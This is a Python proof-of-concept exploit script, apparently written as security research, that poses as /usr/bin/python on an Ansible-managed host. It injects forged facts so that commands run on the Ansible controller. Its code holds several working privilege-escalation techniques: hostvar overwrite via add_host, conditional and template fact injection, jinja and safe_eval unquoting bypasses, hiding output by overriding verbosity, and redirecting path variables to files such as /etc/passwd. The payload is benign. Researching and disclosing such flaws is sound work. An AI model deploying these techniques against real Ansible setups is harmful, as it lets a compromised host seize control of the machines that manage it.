#!/usr/bin/python2.7
"""
This file is intended to be installed as /usr/bin/python onto a target
that's managed by ansible.

Tested against:
- ansible 2.3.0 (devel f1b37a184c) last updated 2016/12/07 20:55:53 (GMT +200)
- ansible 2.2.0.0
"""
from __future__ import print_function

import sys
import os
import json
import subprocess
import socket


PAYLOAD = "touch /tmp/foobarbaz"

# Location of the real python binary.
PYTHON_BIN = "/usr/bin/python2.7"

# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
# Overwrite magic facts to make the next tasks run locally on the controller.
INTERPRETER_FACTS = {
    # Note that it echoes an empty dictionary {} (it's not a format string).
    'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
    'ansible_connection': 'local',
    # Become is usually enabled on the remote host, but on the Ansible
    # controller it's likely password protected. Disable it to prevent
    # password prompts.
    'ansible_become': False,
}


def main(argv):
    # We have full control over the verbosity, allowing us to hide our
    # exploitation attempts.
    disable_verbosity = False

    # Features
    exploit_add_host = False
    exploit_conditional = False
    exploit_template = False
    exploit_unquote_jinja_syntax = False
    exploit_unquote_dict_key = False
    exploit_unquote_eval = False
    overwrite_group_and_default_vars = False

    data = None

    try:
        output = subprocess.check_output([PYTHON_BIN] + argv[1:], stdin=sys.stdin)
        data = json.loads(output)

    except:
        pass

    if data is None or not isinstance(data, dict):
        data = {}

    if 'ansible_facts' not in data or not isinstance(data['ansible_facts'], dict):
        data['ansible_facts'] = {}

    # Example playbook expects that these facts are set.
    data['ansible_facts'].update({
        'ansible_os_family': 'Debian',
        'ansible_distribution': 'Debian',
    })

    if exploit_add_host:
        # Ansible allows modules to add hosts or update hostvars,
        # probably as a way to create a dynamic inventory.

        # If we're lucky, we can guess the inventory_hostname, in
        # which case the host_vars are overwritten [2] and they will
        # be in effect at the next task.
        # If host_name doesn't match inventory_hostname, it might get
        # executed in the play for the next hostgroup, also depending
        # on the limits set on the commandline.

        # (Note that when data["add_host"] is set,
        # data["ansible_facts"] is ignored.)
        data['add_host'] = {
            # assume that host_name is the same as inventory_hostname
            'host_name': socket.gethostname(),
            'host_vars': INTERPRETER_FACTS,
        }

        # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L447
        # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L580

    if exploit_conditional:
        # If we know the exact contents of a "when" clause, and we
        # register it as a fact, a special case checks whether the
        # "when" clause matches a variable [1]. In that case it
        # replaces it with its contents and evaluates [2] them.

        # Known conditionals, separated by newlines
        known_conditionals_str = """
        ansible_os_family == 'Debian'
        ansible_os_family == "Debian"
        ansible_os_family == 'RedHat'
        ansible_os_family == "RedHat"
        ansible_distribution == "CentOS"
        result|failed
        item > 5
        foo is defined
        """
        known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
        for known_conditional in known_conditionals:
            data['ansible_facts'][known_conditional] = LOOKUP

        # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L118
        # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L125

    if exploit_template:
        # The template module/action merges its results with those of
        # the stat module. This allows us to bypass [1][2][3] the stripping of
        # magic variables from ansible_facts [4], because they're at an
        # unexpected location in the result tree.
        data.update({
            'stat': {
                'exists': True,
                'isdir': False,
                'checksum': {
                    'rc': 0,
                    'ansible_facts': INTERPRETER_FACTS,
                },
            }
        })

        # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L39
        # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L49
        # [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L146
        # [4] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/__init__.py#L678

    # The following exploits target set_fact.

    # Remote facts always get quoted [1]. Set_fact unquotes them [2]
    # by evaluating them. UnsafeProxy [3] was designed to defends
    # against unquoting by transforming jinja syntax into jinja
    # comments [4], effectively disabling injection, at a cost.

    # It may be acceptable as a security measure to prevent code
    # execution, but there's a more important issue at stake
    # underneath, namely the correctness. The current implementation
    # is like protecting against SQL injection by removing all
    # quotes. Bad luck if your name is O'Brian; in our system you'll
    # be forever known as OBrian.

    # It would a good idea to update _clean_data [4] to properly quote
    # the data by making the following transformations [5]:
    # "{{" => "{{ '{{' }}"
    # "}}" => "{{ '}}' }}"
    # "{%" => "{{ '{%' }}"
    # "%}" => "{{ '%}' }}"
    # "{#" => "{{ '{#' }}"
    # "#}" => "{{ '#}' }}"
    # "#jinja2" => "{{ '#jinja2' }}"

    # For correctness, the lookup function should return an
    # UnsafeProxy as well, to prevent evaluating jinja syntax in the
    # contents.

    # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L293
    # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/set_fact.py#L40
    # [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/vars/unsafe_proxy.py
    # [4] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L229
    # [5] http://jinja.pocoo.org/docs/dev/templates/#escaping

    if exploit_unquote_jinja_syntax:
        # Bypass the filtering of "{{" and "{%" by changing the jinja
        # syntax [1][2]. The {{}} is needed to make it look like a
        # variable [3].
        # This works against:
        # - set_fact: foo="{{ansible_os_family}}"
        # - command: echo "{{foo}}
        data['ansible_facts'].update({
            'exploit_set_fact': True,
            'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD  + "')]]",
        })

        # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L66
        # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L469
        # [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L308

    if exploit_unquote_dict_key:
        # Strings and lists are properly cleaned up, but dictionary
        # keys are not [1].
        # This works against:
        # - set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
        # - command: echo "{{foo}}
        # The prefix and/or suffix are needed in order to turn the
        # dict into a string, otherwise the value would remain a dict.
        data['ansible_facts'].update({
            'exploit_set_fact': True,
            'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
        })

        # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/vars/unsafe_proxy.py#L104

    if exploit_unquote_eval:
        # There's a special case for evaluating strings that look like
        # a list or dict [1]. Strings that begin with "{" or "[" are
        # evaluated by safe_eval [2]. This allows us to bypass the
        # removal of jinja syntax [3].
        # This works against:
        # - set_fact: foo="{{ansible_os_family}}"
        # - command: echo "{{foo}}
        data['ansible_facts'].update({
            'exploit_set_fact': True,
            'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
        })

        # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L334
        # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/safe_eval.py
        # [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L229

    if disable_verbosity:
        data['_ansible_verbose_override'] = 0

        # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L99
        # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L208

    failed_attempt = False
    if failed_attempt:
        # The following bypasses [1] the stripping of magic variables
        # by making use of the fact that dict.update accepts a list of
        # tuples. It's only protected by the fact that lists don't
        # have a "copy" [2] method.
        data['ansible_facts'] = [
            ['ansible_python_interpreter', 'local'],
            ['ansible_connection', 'local'],
            ['ansible_become', False],
        ]

        # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/__init__.py#L678
        # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L502

    if overwrite_group_and_default_vars:
        # When variables are used to point to local paths on the
        # Ansible controller, they can be overridden by a remote host.
        # There currently is no way to whitelist (or blacklist) facts
        # on a playbook or task basis.

        # When the variables are used to point to local files on the
        # Ansible controller, a remote host can change it to get hold
        # of a file, or to overwrite a file.

        data['ansible_facts'].update({
            'example_dont_overwrite_me': '/etc/passwd',
        })

    sys.stdout.write(json.dumps(data))
    sys.stdout.write('\n')

    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))
